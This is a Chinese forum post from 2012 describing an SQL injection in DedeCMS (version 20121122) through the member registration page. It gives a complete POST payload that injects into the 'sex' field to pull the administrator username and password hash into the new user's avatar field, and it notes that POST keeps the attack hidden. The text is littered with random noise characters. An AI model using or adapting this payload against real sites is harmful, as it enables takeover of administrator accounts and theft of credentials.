dedecms版本 20121122
% q8 _% B5 [6 ~/ }# j+ v4 L1 \; _$ @/ ^4 Q7 K/ f5 A3 x5 j+ g
需要magic_quotes_gpc=Off0 ]5 L$ ^; D, U/ G$ B; N
4 Y/ S6 {2 E. Z9 f
应该是没有什么大危害的漏洞.
/ m6 w) b# W+ \* X7 D; ^: q- {原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
) I0 u* r2 L* t! u& r$ q" z& t1 n3 j7 Z9 r! `( p, ~
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.2 [* f. s) c, W& c7 i% `! ~
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
9 O+ \* h' n$ p! M2 F( b! M" H# I1 W1 i/ L
http:///de/member/reg_new.php9 ?" { S2 L1 i. [; h2 M& D
, a. i2 q: a: y M Y, @4 T
POST
' m/ S1 |4 G( Q7 H e; V* L: E) r& }8 a. F2 Y! w# ]1 I
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=; W) ]. ] B; ?. S0 U
2 J" G6 I! G7 k' q% w. G6 W
成功注册后,头像处里面有好玩的信息.* F' A" X0 H* U+ e
9 m$ I7 |; }) I/ w5 M3 p* p$ ~# r6 _
|
发表于 2012-12-5 10:03:32
收藏
支持
反对